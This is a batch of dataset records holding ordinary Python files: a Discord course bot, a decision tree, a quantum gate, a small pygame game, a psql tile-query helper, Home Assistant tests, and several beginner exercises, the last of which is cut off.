logging.info(\"Online\") \n\n async def on_message(self, message):\n \"\"\"\n Handles messages from other users. Currently this is a command handler.\n Messages are only parsed if they were sent to the designated control\n channel.\n \n * message (Message) - a discord.py message object\n \"\"\"\n \n if message.author == self.user:\n return\n \n if message.channel.id == self._cfg[\"CONTROL_CHANNEL\"]:\n logging.debug(\"Command channel event\")\n await self._parse_command(message)\n \n async def _parse_command(self, message):\n \"\"\"\n Parses messages that are regarded commands, currently marked with \n exclamation mark prefix (!). The separator is configurable in order to\n account for different use cases without adding escape mechanisms to\n the command syntax.\n \n Command handlers are looked up with getattr and need to be named in\n the _{command_keyword}_command pattern.\n\n * message (Message) - a discord.py message object\n \"\"\"\n \n content = message.content.lstrip(\"<@0123456789> \")\n logging.debug(content)\n\n if not content.startswith(\"!\"):\n return\n command, *args = content.lstrip(\"!\").split(\n self._cfg[\"COMMAND_SEP\"]\n )\n logging.info(f\"Received command {command} with args:\")\n logging.info(self._cfg[\"COMMAND_SEP\"].join(args))\n handler = getattr(self, f\"_{command}_handler\", self._invalid_command)\n await handler(message, *args)\n \n async def _invalid_command(self, message, *args):\n \"\"\"\n Default handler for commands that are not supported. Logs the attempted\n command as a warning.\n\n * message (Message) - a discord.py message object\n \"\"\"\n \n logging.warning(\"Reveived invalid command\")\n logging.warning(message.content)\n \n async def _test_handler(self, message, *args):\n \"\"\"\n A simple test command handler for testing that commands go through.\n\n * message (Message) - a discord.py message object\n \"\"\"\n \n logging.debug(\"Received test command\")\n\n async def _addcourse_handler(self, \n message,\n role_id,\n course_code,\n course_name_en,\n course_name_fi):\n \"\"\"\n Handler for the addcourse command. Upon receiveing this command, the\n bot will post a new signup message to the desingated signup channel,\n using the message template from configuration. 
After confirming that\n the message has been posted, the bot creates a database record for the\n new course that associates the message ID with the course, and \n especially course's role ID. \n \n * message (Message) - a discord.py message object\n * role_id (int) - ID of an existing role\n * course_code (str) - course's official code\n * course_name_en (str) - course's name in English\n * course_name_fi (str) - course's name in Finnish\n \"\"\"\n \n channel = self.get_channel(self._cfg[\"SIGNUP_CHANNEL\"])\n signup = await channel.send(\n self._cfg[\"MESSAGES\"][\"SIGNUP\"].format(\n code=course_code,\n name_en=course_name_en,\n name_fi=course_name_fi,\n )\n )\n with Session(self._engine) as s:\n course = db.Course(\n code=course_code,\n name_fi=course_name_fi,\n name_en=course_name_en,\n role_id=int(role_id),\n message_id=signup.id\n )\n s.add(course)\n s.commit()\n","repo_name":"enkwolf/ITEE-discord-bot","sub_path":"iteebot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":8822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10509768410","text":"#strings are immutable\n#strings defined cannot be changed\nstring=\"string\"\n\n#with replace method only new string can be formed but original cannot be changed\nstring.replace('t','T')\n\nprint(\"string\")# this print will give old value of string \n\n#as to get changed value of string firstly it would have to store in new variable\nstr=string.replace('t','T')\nprint(str)","repo_name":"Jitendra7740/Jitendra-Python-Repository","sub_path":"class37-strings are immutable in python-CipherSchools.py","file_name":"class37-strings are immutable in python-CipherSchools.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28946399119","text":"\nimport numpy as np\nfrom sklearn.cross_validation import train_test_split\nclass Tree:\n def __init__(self, label, attr, rotest=None):\n self.root = None\n boundary = len(label) // 3\n if rotest is None:\n self.root = self.createTree(label[boundary:], attr[boundary:],\n np.array(range(len(attr.transpose()))), False)\n return\n\n @staticmethod\n def getEntroy(label, attribute):\n result = 0.0\n for this_attr in np.unique(attribute):\n label_temp, entropy = label[np.where(attribute == this_attr)[0]], 0.0\n for this_label in np.unique(label_temp):\n p = len(np.where(label_temp == this_label)[0]) / len(label_temp)\n entropy -= p * np.log2(p)\n result += len(label_temp) / len(label) * entropy\n return result\n\n def createTree(self, label, attribute, attr_idx, prePr, check_attr=None, check_label=None):\n node, right_count = {}, None\n max_type = np.argmax(np.bincount(label))\n if len(np.unique(label)) == 1:\n # 样本同一类\n node['type'] = label[0]\n return node\n if attribute is None or len(np.unique(attribute, axis=0)) == 1:\n #根节点调整\n node['type'] = max_type\n return node\n attr_trans = np.transpose(attribute)\n min_entropy, best_attr = np.inf, None\n\n if prePr:\n right_count = len(np.where(check_label == max_type)[0])\n for this_attr in attr_trans:\n entropy = self.getEntroy(label, this_attr)\n if entropy < min_entropy:\n min_entropy = entropy\n best_attr = this_attr\n\n branch_attr_idx = np.where((attr_trans == best_attr).all(1))[0][0]\n if prePr:\n sub_right_count = 0\n check_attr_trans = check_attr.transpose()\n\n for temp in np.unique(best_attr):\n branch_data_idx = np.where(best_attr == temp)[0]\n predict_label = 
np.argmax(np.bincount(label[branch_data_idx]))\n                check_data_idx = np.where(check_attr_trans[branch_attr_idx] == temp)[0]\n                check_branch_label = check_label[check_data_idx]\n                sub_right_count += len(np.where(check_branch_label == predict_label)[0])\n            if sub_right_count <= right_count:\n                node['type'] = max_type\n                return node\n        values = []\n        for temp in np.unique(best_attr):\n            values.append(temp)\n            branch_data_idx = np.where(best_attr == temp)[0]\n            if len(branch_data_idx) == 0:\n                new_node = {'type': np.argmax(np.bincount(label))}\n            else:\n                branch_label = label[branch_data_idx]\n                branch_attr = np.delete(attr_trans, branch_attr_idx, axis=0).transpose()[branch_data_idx]\n                new_node = self.createTree(branch_label, branch_attr,\n                                           np.delete(attr_idx, branch_attr_idx, axis=0),\n                                           prePr, check_attr, check_label)\n            node[str(temp)] = new_node\n        node['attr'] = attr_idx[branch_attr_idx]\n        node['type'] = max_type\n        node['values'] = values\n        return node\n\n\n    # predict the label for one sample\n    def predict(self, data):\n        node = self.root\n        while node.get('attr') is not None:\n            attr = node['attr']\n            node = node.get(str(data[attr]))\n            if node is None:\n                return None\n        return node.get('type')\n\n\n\n\n\nall_data = np.loadtxt(\"train.txt\")# read the data\nlabel = all_data[:, -1]\nlabel = label.astype(int) # convert labels to integers\n\ndata = np.delete(all_data, -1, axis=1)\nprint(data.shape,label.shape)\n\n# evaluate the tree for several train/test splits\nfor test_size in (0.2, 0.4, 0.6, 0.8):\n    X_train,X_test,y_train,y_test = train_test_split(data,label,test_size = test_size,random_state = 0)\n\n    tree = Tree(y_train, X_train, None)\n\n    test_count = len(y_test)\n    test_data, test_label = X_test, y_test\n\n    times = 0 # correct-prediction counter\n\n    for idx in range(test_count):\n        if tree.predict(test_data[idx]) == test_label[idx]:\n            times += 1\n\n    print('accuracy with test_size %.1f: %.2f %%' % (test_size, times * 100 / test_count))\n\n","repo_name":"louisgzli/CS405_Machine_Learning","sub_path":"week2/DecisionTree.py","file_name":"DecisionTree.py","file_ext":"py","file_size_in_byte":5660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32428410438","text":"from braket.circuits import circuit\nimport 
numpy\n\n\n@circuit.subroutine(register=True)\ndef CRYGate(theta, dtype=None):\n theta2 = float(theta) / 2\n cos = numpy.cos(theta2)\n sin = numpy.sin(theta2)\n return numpy.array([[1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, cos, -sin],\n [0, 0, sin, cos]], dtype=dtype)\n","repo_name":"artificial-brain/quantumcat","sub_path":"quantumcat/gates/custom_gates/braket/cry_gate.py","file_name":"cry_gate.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"19"} +{"seq_id":"41737529347","text":"import os\nimport pygame\nfrom pygame.locals import *\nfrom enum import Enum\nfrom collections import namedtuple\n\n#%% Constants\n\nFPS = 7\nWINDOWWIDTH = 200\nWINDOWHEIGHT = 200\nBLOCKSIZE = 20\nassert WINDOWWIDTH % BLOCKSIZE == 0, \"Window width must be a multiple of block size.\"\nassert WINDOWHEIGHT % BLOCKSIZE == 0, \"Window height must be a multiple of block size.\"\nCELLWIDTH = int(WINDOWWIDTH / BLOCKSIZE)\nCELLHEIGHT = int(WINDOWHEIGHT / BLOCKSIZE)\n\n# R G B\nWHITE = (255, 255, 255)\nBLACK = ( 0, 0, 0)\nRED = (255, 0, 0)\nGREEN = ( 0, 255, 0)\nDARKGREEN = ( 0, 155, 0)\nDARKGRAY = ( 40, 40, 40)\nYELLOW = (255, 255, 0)\n\nUP = 'up'\nDOWN = 'down'\nLEFT = 'left'\nRIGHT = 'right'\n\n\nBGCOLOR = BLACK\n\n # start Block close to the top of the game window\nstartx = 2*BLOCKSIZE\nstarty = 2*BLOCKSIZE\n\ntx = (BLOCKSIZE * 8)\nty = (BLOCKSIZE * 8)\n\n\n#%% Main Game\n\nPoint = namedtuple('Point', 'x, y') \n\nclass blocks:\n def __init__(self):\n global FPSCLOCK, DISPLAYSURF, BASICFONT\n\n FPSCLOCK = pygame.time.Clock()\n DISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT))\n BASICFONT = pygame.font.Font('freesansbold.ttf', 18)\n pygame.display.set_caption('Q_learning_Block_Game')\n\n # init game state\n \n self.direction = None\n\n self.head = Point(startx, starty) # got this code (Point(x,y) from snake_game)\n self.blocks = [self.head, \n ] #for future I should be able to insert more blocks into this list!\n \n self.t = Point(tx, ty)\n self.target = [self.t]\n\n def play_step(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n os._exit(0)\n\n\n DISPLAYSURF.fill(BGCOLOR)\n\n def drawGrid(self):\n for x in range(0, WINDOWWIDTH, BLOCKSIZE): # draw vertical lines\n pygame.draw.line(DISPLAYSURF, DARKGRAY, (x, 0), (x, WINDOWHEIGHT))\n for y in range(0, WINDOWHEIGHT, BLOCKSIZE): # draw horizontal lines\n pygame.draw.line(DISPLAYSURF, DARKGRAY, (0, y), (WINDOWWIDTH, y))\n\n def draw_Block(self):\n for pt in self.blocks:\n pygame.draw.rect(DISPLAYSURF, RED, pygame.Rect(pt.x, pt.y, BLOCKSIZE, BLOCKSIZE))\n # access the x and y coordinates of nametuple using index numbers!!! x = 400 and y = 300. x and y are just the keys to find the values of x and y. 
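# --- illustrative aside (not part of this repository) ---
# A quick numpy check of the controlled-RY matrix built by the CRYGate
# subroutine above: a real rotation matrix should satisfy M @ M.T == I, and
# theta = 0 should reduce to the identity. Verification sketch only, not part
# of the quantumcat API.
import numpy

def cry_matrix(theta):
    c, s = numpy.cos(theta / 2), numpy.sin(theta / 2)
    return numpy.array([[1, 0, 0, 0],
                        [0, 1, 0, 0],
                        [0, 0, c, -s],
                        [0, 0, s, c]])

m = cry_matrix(0.7)
assert numpy.allclose(m @ m.T, numpy.eye(4))          # unitary (real, so M M^T = I)
assert numpy.allclose(cry_matrix(0.0), numpy.eye(4))  # identity at theta = 0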
Its like a dictionary.\n\n\n def draw_target(self):\n for pt in self.target:\n pygame.draw.rect(DISPLAYSURF, GREEN, pygame.Rect(pt.x, pt.y, BLOCKSIZE, BLOCKSIZE))\n\n","repo_name":"ivicino/Block_game","sub_path":"Block_game_AI.py","file_name":"Block_game_AI.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19629282669","text":"#!/usr/bin/python\n\n#create extension postgres_fdw;\n#create server zhangyu foreign data wrapper postgres_fdw options(host '192.168.2.120', port '5432', dbname 'taxi_data');\n#create user mapping for postgres server zhangyu options(user 'postgres', password 'p@ssw0rd');\n\n\n\n\nimport binascii\nimport sys\nimport math\nimport time\nimport os\nimport subprocess\n\ndef num2deg(xtile, ytile, zoom):\n n = 2.0 ** zoom\n lon_deg = xtile / n * 360.0 - 180.0\n lat_rad = math.atan(math.sinh(math.pi * (1 - 2 * ytile / n)))\n lat_deg = math.degrees(lat_rad)\n return (lat_deg, lon_deg)\n \nwhile True:\n (z,x,y,s) = map(float,sys.stdin.readline().split());\n (lat1, long1)=num2deg(x,y,z);\n (lat2, long2)=num2deg(x+1,y+1,z);\n seq=str(int(s));\n minzoom = str(int(z));\n slong1 = str(long1);\n slong2 = str(long2);\n slat1 = str(lat1);\n slat2 = str(lat2);\n if 1 <= int(s) and int(s) <= 96:\n args='psql -d osm_beijing -U postgres -c \\'select * from traffic_exist where z=' + str(int(z)) + ' and ' + 'x=' + str(int(x)) + ' and ' + 'y=' + str(int(y)) + 'and ' + 'seq=' + seq + ';\\'| wc -l';\n sqlline = subprocess.Popen(args, stdout=subprocess.PIPE, shell=True);\n count = int(sqlline.stdout.read())-4;\n if count == 0:\n os.system('psql -d osm_beijing -U postgres -c \\'insert into traffic_exist VALUES(' + str(z) +',' + str(x) + ',' + str(y) + ',' + str(seq) + ')\\'' + ' >> /dev/null 2>&1');\n pcomm = 'psql -d osm_beijing -U postgres -c \"insert into traffic_' + seq + ' ' + 'select a.gid, a.average_speed, a.name, b.the_geom as geom, b.osm_id, c.highway, c.minzoom from traffic_info_' + seq + ' ' +'a, ways_reference b, planet_osm_line c where a.gid = b.gid and b.osm_id = c.osm_id and ST_Intersects(ST_GeometryFromText(\\'POLYGON((' + slong1 + ' ' + slat1 + ',' + slong2 + ' ' + slat1 + ',' + slong2 + ' ' + slat2 + ',' + slong1 + ' ' + slat2 + ',' + slong1 + ' ' + slat1 +'))\\',4326),the_geom) is true and c.minzoom <=' + minzoom + ' ' + ';\"' + ' >> /dev/null 2>&1';\n os.system(pcomm);\n url=':8080/geoserver/osm_ubuntu/ows?service=WFS&version=1.0.0&request=GetFeature&typeName=osm_ubuntu:traffic_beijing&outputFormat=application/json' + '&viewparams=' + 'long1:' + str(long1) +';' + 'lat1:' + str(lat1) + ';' + 'long2:' + str(long2) + ';' + 'lat2:' + str(lat2) + ';' + 'seq:' + seq + ';' + 'minzoom:' + minzoom +' \\n';\n sys.stdout.write(url);\n sys.stdout.flush();\n else:\n sys.stdout.write('/void/void.json' + '\\n');\n sys.stdout.flush();","repo_name":"lchao-bit/server_side_configure","sub_path":"apache_configure/process_traffic_new.py","file_name":"process_traffic_new.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3426807425","text":"def loop():\n print (\"--------------------------------------------------\")\n fromlocation = input(\"where are you. 
belarus,chad,philadelphia,brazil,jamaica,democratic republic of the congo,australia,new mexico \")\n locations = [\"belarus\",\"chad\",\"philadelphia\",\"brazil\",\"democratic republic of the congo\",\"australia\",\" belarus\",\" chad\",\"new mexico\",\" philadelphia\",\" brazil\",\" democratic republic of the congo\",\" australia\",\" new mexico\"]\n if not fromlocation in locations:\n print (\"you lyin\")\n loop()\n golocation = input(\"where are you going. belarus,chad,philadelphia,brazil,jamaica,democratic republic of the congo,australia,new mexico \")\n if not golocation in locations:\n print (\"we dont go there\")\n loop()\n if golocation == fromlocation:\n print (\"you already there\")\n loop()\n name = input(\"what is your name \")\n city = input(\"what is your city \")\n birthmonth = input(\"what month were you born? \")\n months = ('january','february','march', 'april', 'may','june','july','august','september','october','november','december')\n if not birthmonth in months:\n print (\"nah\")\n loop()\n birthday = input(\"what day were you born(number not monday,tuesday,wednesday,etc) \")\n days = (1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31)\n if not int(birthday) in days:\n print (\"nah\")\n loop()\n birthyear = input(\"what year were you born? \")\n \n \n classairplane = input(\"what class your ordering 1st class, 2nd class, 3rd class \")\n classes = (\"1st class\", \"2nd class\",\"3rd class\")\n \n if not classairplane in classes:\n print (\"nah\")\n loop()\n print (\"--------------------------------------------------\")\n print (name)\n print (\"going to \"+golocation+\" from \"+fromlocation+\".\")\n print (\"in \"+city+\".\")\n print (\"born \"+birthmonth+\" \"+birthday+\" \"+birthyear+\".\")\n print (classairplane)\nloop()","repo_name":"ljxk/airline-reservation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12942900480","text":"# Source: https://gist.github.com/uroshekic/11078820\r\nfrom tkinter import *\r\nimport re\r\n\r\nclass AutocompleteEntry(Entry):\r\n def __init__(self, root):\r\n self.listboxLength = 8\r\n\r\n Entry.__init__(self, master=root, width=30)\r\n self.focus()\r\n\r\n self.autocompleteList = []\r\n with open(\"../data/species_name.txt\", \"r\") as f:\r\n for line in f.readlines():\r\n self.autocompleteList.append(line[:-1])\r\n \r\n self.var = self[\"textvariable\"]\r\n if self.var == '':\r\n self.var = self[\"textvariable\"] = StringVar()\r\n\r\n self.var.trace('w', self.changed)\r\n self.bind(\"\", self.selection)\r\n self.bind(\"\", self.moveUp)\r\n self.bind(\"\", self.moveDown)\r\n \r\n self.listboxUp = False\r\n \r\n def matchesFunction(self, fieldValue, acListEntry):\r\n pattern = re.compile('.*' + re.escape(fieldValue) + '.*', re.IGNORECASE)\r\n return re.match(pattern, acListEntry)\r\n\r\n def changed(self, name, index, mode):\r\n if self.var.get() == '':\r\n if self.listboxUp:\r\n self.listbox.destroy()\r\n self.listboxUp = False\r\n else:\r\n words = self.comparison()\r\n if words:\r\n if not self.listboxUp:\r\n self.listbox = Listbox(width=self[\"width\"], height=self.listboxLength)\r\n self.listbox.bind(\"\", self.selection)\r\n self.listbox.bind(\"\", self.selection)\r\n self.listbox.place(x=self.winfo_x(), y=self.winfo_y() + self.winfo_height())\r\n self.listboxUp = True\r\n \r\n self.listbox.delete(0, END)\r\n for w in words:\r\n 
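# --- illustrative aside (not part of this repository) ---
# matchesFunction above compiles '.*<escaped text>.*' with re.IGNORECASE, so it
# behaves like a case-insensitive substring test; a small standalone check
# (the species name here is made up for the example):
import re

def matches(field_value, entry):
    pattern = re.compile('.*' + re.escape(field_value) + '.*', re.IGNORECASE)
    return re.match(pattern, entry) is not None

assert matches("an", "Panthera leo")        # case-insensitive hit anywhere
assert not matches("xyz", "Panthera leo")   # no substring, no match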
self.listbox.insert(END,w)\r\n else:\r\n if self.listboxUp:\r\n self.listbox.destroy()\r\n self.listboxUp = False\r\n \r\n def selection(self, event):\r\n if self.listboxUp:\r\n self.var.set(self.listbox.get(ACTIVE))\r\n self.listbox.destroy()\r\n self.listboxUp = False\r\n self.icursor(END)\r\n\r\n def moveUp(self, event):\r\n if self.listboxUp:\r\n if self.listbox.curselection() == ():\r\n index = '0'\r\n else:\r\n index = self.listbox.curselection()[0]\r\n \r\n if index != '0': \r\n self.listbox.selection_clear(first=index)\r\n index = str(int(index) - 1)\r\n \r\n self.listbox.see(index) # Scroll!\r\n self.listbox.selection_set(first=index)\r\n self.listbox.activate(index)\r\n\r\n def moveDown(self, event):\r\n if self.listboxUp:\r\n if self.listbox.curselection() == ():\r\n index = '0'\r\n else:\r\n index = self.listbox.curselection()[0]\r\n \r\n if index != END: \r\n self.listbox.selection_clear(first=index)\r\n index = str(int(index) + 1)\r\n \r\n self.listbox.see(index) # Scroll!\r\n self.listbox.selection_set(first=index)\r\n self.listbox.activate(index) \r\n\r\n def comparison(self):\r\n return [ w for w in self.autocompleteList if self.matchesFunction(self.var.get(), w) ]\r\n","repo_name":"ymmouse/DSCI_551_project","sub_path":"gui/autofill.py","file_name":"autofill.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16735289284","text":"# Ref: Course\ndef merge_sort(string, start=0, end=None):\n if end is None:\n end = len(string)\n if (end - start) > 1:\n mid = (start + end) // 2\n merge_sort(string, start, mid)\n merge_sort(string, mid, end)\n merge(string, start, mid, end)\n\n\ndef merge(string, start, mid, end):\n left = string[start:mid]\n right = string[mid:end]\n\n left_index, right_index = 0, 0\n\n for general_index in range(start, end):\n if left_index >= len(left):\n string[general_index] = right[right_index]\n right_index = right_index + 1\n elif right_index >= len(right):\n string[general_index] = left[left_index]\n left_index = left_index + 1\n elif left[left_index] < right[right_index]:\n string[general_index] = left[left_index]\n left_index = left_index + 1\n else:\n string[general_index] = right[right_index]\n right_index = right_index + 1\n\n\ndef is_anagram(first_string, second_string):\n first_string_in_list = [letter.lower() for letter in first_string]\n second_string_in_list = [letter.lower() for letter in second_string]\n\n merge_sort(first_string_in_list)\n merge_sort(second_string_in_list)\n\n first_ordered_string = \"\".join(first_string_in_list)\n second_ordered_string = \"\".join(second_string_in_list)\n is_anagram_result = True\n\n if len(first_string) <= 0 or len(second_string) <= 0:\n return (first_ordered_string, second_ordered_string, False)\n\n for letter in first_ordered_string:\n if letter != second_ordered_string[first_ordered_string.index(letter)]:\n is_anagram_result = False\n break\n return (first_ordered_string, second_ordered_string, is_anagram_result)\n","repo_name":"LuizFelipe406/python-algorithms","sub_path":"challenges/challenge_anagrams.py","file_name":"challenge_anagrams.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28951639147","text":"\"\"\"Tests for the config flow.\"\"\"\nimport re\nimport pytest\n\nfrom unittest.mock import ANY, patch\nfrom homeassistant.const import (\n CONF_AUTHENTICATION,\n CONF_NAME,\n 
CONF_PASSWORD,\n CONF_SCAN_INTERVAL,\n CONF_URL,\n CONF_USERNAME,\n CONF_VERIFY_SSL,\n HTTP_BASIC_AUTHENTICATION,\n)\nfrom pytest_homeassistant_custom_component.common import MockConfigEntry\n\nfrom custom_components.nipca_custom import config_flow\nfrom custom_components.nipca_custom.const import (\n DEFAULT_NAME,\n DOMAIN,\n SCAN_INTERVAL,\n STEP_CONFIG,\n STILL_IMAGE,\n)\n\nfrom tests.conftest import TEST_URL, TEST_URL_PATTERN\nfrom tests.test_binary_sensor import URL_INFO_LINES\n\n\n@pytest.mark.asyncio\nasync def test_validate_auth_valid(httpx_mock, hass):\n \"\"\"Test no exception is raised for a valid path.\"\"\"\n httpx_mock.add_response(url=TEST_URL, text=URL_INFO_LINES)\n httpx_mock.add_response(url=STILL_IMAGE.format(TEST_URL))\n response = await config_flow.is_valid_auth({CONF_URL: TEST_URL}, {}, hass)\n assert response is True\n\n\n@pytest.mark.asyncio\nasync def test_validate_auth_invalid(httpx_mock, hass):\n \"\"\"Test no exception is raised for a valid path.\"\"\"\n httpx_mock.add_response(url=TEST_URL, status_code=404)\n response = await config_flow.is_valid_auth({CONF_URL: TEST_URL}, {}, hass)\n assert response is False\n\n\n@pytest.mark.asyncio\n@patch(\"custom_components.nipca_custom.config_flow.DLinkUPNPProfile.async_discover\")\nasync def test_flow_user_init(async_discover, hass):\n \"\"\"Test the initialization of the form in the first step of the config flow.\"\"\"\n async_discover.return_value = [{\"LOCATION\": \"test\"}]\n result = await hass.config_entries.flow.async_init(\n config_flow.DOMAIN, context={\"source\": \"user\"}\n )\n expected = {\n \"data_schema\": ANY,\n \"description_placeholders\": None,\n \"errors\": None,\n \"flow_id\": ANY,\n \"handler\": \"nipca_custom\",\n \"last_step\": None,\n \"step_id\": \"user\",\n \"type\": \"form\",\n }\n\n assert expected == result\n assert CONF_NAME in result[\"data_schema\"].schema\n assert CONF_URL in result[\"data_schema\"].schema\n\n\n@pytest.mark.asyncio\nasync def test_flow_auth_form(hass):\n \"\"\"Test the initialization of the form in the second step of the config flow.\"\"\"\n result = await hass.config_entries.flow.async_init(\n config_flow.DOMAIN, context={\"source\": \"auth\"}\n )\n expected = {\n \"data_schema\": config_flow.AUTH_SCHEMA,\n \"description_placeholders\": None,\n \"errors\": {},\n \"flow_id\": ANY,\n \"handler\": \"nipca_custom\",\n \"step_id\": \"auth\",\n \"last_step\": None,\n \"type\": \"form\",\n }\n assert expected == result\n\n\n@pytest.mark.asyncio\n@patch(\"custom_components.nipca_custom.config_flow.is_valid_auth\")\nasync def test_flow_auth_invalid(is_valid_auth, hass):\n \"\"\"Test errors populated when auth is invalid.\"\"\"\n is_valid_auth.return_value = False\n config_flow.NipcaConfigFlow.data = {}\n _result = await hass.config_entries.flow.async_init(\n config_flow.DOMAIN, context={\"source\": \"auth\"}\n )\n result = await hass.config_entries.flow.async_configure(\n _result[\"flow_id\"], user_input={CONF_USERNAME: \"bad\", CONF_PASSWORD: \"bad\"}\n )\n assert {\"base\": \"invalid_auth\"} == result[\"errors\"]\n\n\n@pytest.mark.asyncio\nasync def test_flow_config_form(hass):\n \"\"\"Test the initialization of the form in the third step of the config flow.\"\"\"\n result = await hass.config_entries.flow.async_init(\n config_flow.DOMAIN, context={\"source\": STEP_CONFIG}\n )\n expected = {\n \"data_schema\": config_flow.get_config_schema(SCAN_INTERVAL),\n \"description_placeholders\": None,\n \"errors\": None,\n \"flow_id\": ANY,\n \"handler\": \"nipca_custom\",\n \"step_id\": 
STEP_CONFIG,\n        \"last_step\": None,\n        \"type\": \"form\",\n    }\n    assert expected == result\n\n\n@pytest.mark.asyncio\nasync def test_options_flow_init(httpx_mock, hass):\n    \"\"\"Test config flow options.\"\"\"\n    httpx_mock.add_response(url=TEST_URL, text=URL_INFO_LINES)\n    httpx_mock.add_response(url=re.compile(TEST_URL_PATTERN))\n\n    config_entry = MockConfigEntry(\n        domain=DOMAIN,\n        unique_id=\"test_unique_id\",\n        data={\n            CONF_URL: TEST_URL,\n            CONF_AUTHENTICATION: HTTP_BASIC_AUTHENTICATION,\n            CONF_USERNAME: \"test\",\n            CONF_PASSWORD: \"test\",\n            CONF_VERIFY_SSL: False,\n            CONF_NAME: \"NIPCA Custom\",\n            CONF_SCAN_INTERVAL: 10,\n        },\n        options={\n            CONF_SCAN_INTERVAL: 5,\n        },\n    )\n    config_entry.add_to_hass(hass)\n    assert await hass.config_entries.async_setup(config_entry.entry_id)\n    await hass.async_block_till_done()\n\n    # show initial form\n    _result = await hass.config_entries.options.async_init(config_entry.entry_id)\n\n    assert \"form\" == _result[\"type\"]\n    assert \"init\" == _result[\"step_id\"]\n    assert None is _result[\"errors\"]\n\n    result = await hass.config_entries.options.async_configure(\n        _result[\"flow_id\"],\n        user_input={CONF_SCAN_INTERVAL: 5},\n    )\n\n    assert \"create_entry\" == result[\"type\"]\n    assert {\"scan_interval\": 5} == result[\"data\"]\n\n    # Unload the entry and verify that the data has been removed\n    assert await hass.config_entries.async_unload(config_entry.entry_id)\n    assert config_entry.entry_id not in hass.data[DOMAIN]\n","repo_name":"uncle-yura/nipca_custom","sub_path":"tests/test_config_flow.py","file_name":"test_config_flow.py","file_ext":"py","file_size_in_byte":5418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"1768199231","text":"import os\nimport time\nfrom getmodule.get_collector import GetCollector\nfrom getmodule.csv_util import CsvWriter\nfrom getmodule.file_path_util import FilePathUtil\n\nclass GetCollectorExecuter:\n    HEADARE = ['horse_id', '馬名', '性', '生年', '馬主']\n    \n    def __init__(self, sire_name):\n        self.sire_name = sire_name\n\n    # create the file datas/{sire name}/horse_base.csv\n    def get_get_dict(self) -> None:\n        # create the subdirectory for the sire\n        sire_dir = FilePathUtil.get_sire_dir(self.sire_name)\n        os.makedirs(sire_dir, exist_ok=True)\n\n        # build the path for the progeny CSV\n        horse_base_csv_path = FilePathUtil.get_horse_base_csv_path(self.sire_name)\n        \n        # declare a CsvWriter for horse_base_csv_path\n        csv_writer = CsvWriter(horse_base_csv_path)\n        # open the file in 'w' mode\n        csv_writer.open_file('w')\n        # write the header row\n        csv_writer.writerow(GetCollectorExecuter.HEADARE)\n\n        # create a GetCollector and run the collection\n        get_collector = GetCollector(self.sire_name)\n\n        try:\n            while True:\n                # fetch the progeny info for the current target page\n                get_dict_rsult = get_collector.get_get_dict()\n                \n                # break once every target page has been processed\n                if len(get_dict_rsult) == 0:\n                    break\n\n                # write the current page's progeny info to the CSV\n                for horse_id, horse_datas in get_dict_rsult.items():\n                    csv_writer.writerow([horse_id] + horse_datas)\n\n                # sleep for one second, per the 'hit one URL, sleep one second' rule\n                time.sleep(1)\n        finally:\n            # close the CsvWriter\n            csv_writer.close_file()\n    ","repo_name":"small-java-world/growth_curve_of_horse","sub_path":"getmodule/get_collector_executer.py","file_name":"get_collector_executer.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41260401189","text":"def knapsack(obj,value,weight,capacity):\r\n    pw=[0.0]*len(obj)\r\n    for i in range(len(obj)):\r\n        pw[i]=value[i]/weight[i]\r\n        # if weight[i]>capacity:\r\n        #     pw[i]=0.0\r\n    max_value=0\r\n    
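# --- illustrative aside (not part of this repository) ---
# An alternative sketch of the same greedy fractional-knapsack strategy used
# below: sort the items once by value/weight ratio instead of re-scanning the
# ratio list for the maximum on every pass. Names here are made up.
def fractional_knapsack(values, weights, capacity):
    items = sorted(zip(values, weights), key=lambda vw: vw[0] / vw[1], reverse=True)
    total = 0.0
    for value, weight in items:
        if capacity <= 0:
            break
        take = min(weight, capacity)   # whole item, or the fraction that fits
        total += value * take / weight
        capacity -= take
    return total

# e.g. fractional_knapsack([10, 5, 15], [2, 3, 5], 7) == 25.0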
